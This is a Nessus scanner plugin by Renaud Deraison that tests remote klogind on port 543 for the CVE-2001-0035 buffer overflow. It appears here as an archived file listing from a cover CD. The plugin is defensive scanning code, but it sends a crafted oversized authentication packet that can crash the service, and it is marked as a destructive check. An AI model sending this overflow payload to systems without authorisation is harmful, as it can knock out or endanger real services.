home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / kerberos_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  96 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10411);
  10.  script_cve_id("CVE-2001-0035");
  11.  script_version ("$Revision: 1.7 $");
  12.  
  13.  name["english"] = "klogind overflow";
  14.  name["francais"] = "Divers dΘpassement de buffers dans klogind";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. The remote klogind seems to be vulnerable to a buffer
  19. overflow which may also affect other kerberos related
  20. programs.
  21.  
  22. An attacker may use this to gain a root shell
  23. on this host
  24.  
  25.  
  26. Solution : See Cert Advisory CA-2000-06
  27. Risk factor : High";
  28.  
  29.  
  30.  desc["francais"] = "
  31. Le serveur klogind distant semble etre vulnΘrable
  32. α un dΘpassement de buffer qui peut aussi affecter
  33. d'autre programmes kerberos
  34.  
  35. Un pirate peut utiliser ce problΦme pour obtenir un
  36. shell root sur cette machine
  37.  
  38. Solution : Cf Cert Advisory CA-2000-06
  39. Facteur de risque : ElevΘ";
  40.  script_description(english:desc["english"], francais:desc["francais"]);
  41.  
  42.  summary["english"] = "Attempts to overflow klogind";
  43.  summary["francais"] = "Essaye de trop remplir klogind";
  44.  script_summary(english:summary["english"], francais:summary["francais"]);
  45.  
  46.  script_category(ACT_DESTRUCTIVE_ATTACK);
  47.  
  48.  
  49.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  50.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  51.  family["english"] = "Gain root remotely";
  52.  family["francais"] = "Passer root α distance";
  53.  script_family(english:family["english"], francais:family["francais"]);
  54.  script_dependencie("find_service.nes");
  55.  script_require_ports(543);
  56.  exit(0);
  57. }
  58.  
  59.  
  60.  
  61. port = 543;
  62. if(get_port_state(port))
  63. {
  64.   r = raw_string(0) + 
  65.        "AUTHV0.1" + 
  66.       raw_string(0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  67.            0x00, 0x00, 0x04, 0xB0, 0x04, 0x08, 0x01)
  68.             +
  69.     crap(1226);
  70.     
  71.  
  72. #
  73. # Check for a tcpwrapped klogind
  74. #
  75. r1 = raw_string(0) +  "AUTHV0.1" + raw_string(0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  76.            0x00, 0x00, 0x04, 0xB0, 0x04, 0x08, 0x01);
  77.     
  78. soc = open_priv_sock_tcp(dport:port);    
  79. if(!soc)exit(0);
  80.  
  81. send(socket:soc, data:r1);
  82. rcv = recv(socket:soc, length:1024, min:1);
  83.  
  84.        
  85. if(rcv)
  86. {
  87.  soc = open_priv_sock_tcp(dport:port);    
  88.  send(socket:soc, data:r);
  89.  r = recv(socket:soc, length:1024, min:1);
  90.  if(!r)
  91.   {
  92.   security_hole(port);
  93.   }
  94.  }
  95. }
  96.